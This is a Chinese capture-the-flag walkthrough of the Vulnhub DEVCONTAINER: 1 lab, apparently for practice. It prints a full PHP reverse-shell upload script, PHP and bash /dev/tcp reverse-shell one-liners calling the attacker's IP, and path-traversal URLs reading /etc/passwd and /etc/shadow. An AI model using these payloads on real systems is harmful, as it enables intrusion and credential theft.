| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> vulnhub-DEVCONTAINER: 1 -> 正文阅读 |
|
[PHP知识库]vulnhub-DEVCONTAINER: 1 |
一、环境搭建 下载地址: https://www.vulnhub.com/entry/devcontainer-1,548/ 靶场描述: Goal:?2?flagas 配置IP地址 参考:https://www.cnblogs.com/asstart/p/12626494.html 二、渗透测试 获取靶机IP:利用kali的netdiscover探测靶机IP地址 命令:netdiscover -i eth0(网卡) -r 192.168.226.0/24(网段) 扫描目录:利用kali工具dirb 命令:dirb http://192.168.226.150 文件上传:访问192.168.226.150/upload,上传一个php的反弹shell的脚本reactionshell.php,代码如下 <?php? set_time_limit(0);? $ip=?"192.168.226.130";?#?set?your?kali?ip $port=?4444;?#?set?you?kali?port $fp=@fsockopen($ip,$port,$errno,$errstr); if(!$fp){echo?"error";} else{ ????fputs($fp,"\n+++++++++++++connect?sucess+++++++++\n"); ????while(!feof($fp)){ ????fputs($fp,"shell:"); ????$shell=fgets($fp); ????$message=`$shell`; ????fputs($fp,$message); ????} fclose($fp); } ?> 反弹shell(1):使用kali监听4444端口 nc -lvp 4444 此时执行whoami可以发现当前权限为www-data,且不能进入其他目录,在当前页面中使用php一句话反弹shell php -r '$sock=fsockopen("192.168.226.130",6666);exec("/bin/sh -i <&3 >&3 2>&3");' 反弹shell(2):建立新的监听 nc -lvp 6666,此时权限依然为www-data,但是可以切换目录 但是还是不能进入/Maintenance-Web-Docker目录 使用如下命令提升权限 /usr/bin/script -qc /bin/bash /dev/null stty raw -echo; fg; reset 参考链接(https://schtech.co.uk/linux-reverse-shell-without-python/) 此时可以进入/Maintenance-Web-Docker目录 执行cat list.sh命令我们可以发现我们可以通过执行 echo?"bash?-i?>&?/dev/tcp/192.168.226.130/7777?0>&1"?>>?list.sh 来新生成一个名为richard的shell 反弹shell(3): 获取到了第一个flag 本地文件包含: 执行sudo -l 得到提示 执行框中命令,即可访问之前不能访问的8080端口,通过观察可以发现此端口的页面中存在文件包含 http://192.168.226.150:8080/index.php?view=../../../../../etc/passwd? http://192.168.226.150:8080/index.php?view=../../../../../etc/shadow http://192.168.226.150:8080/index.php?view=../../../../../root/proof.txt 得到flag 提权至root: (1)将reactionshell.php 复制到tmp目录中 cp /home/richard/web/upload/files/reactionshell.php /tmp/reactionshell.php 再使用8080端口进行文件包含 http://192.168.226.150:8080//index.php?view=../../../../../../tmp/reaction.php (2)或者: 直接进行文件包含 再次监听4444端口,可以看见当前权限为root |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/14 14:29:07- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |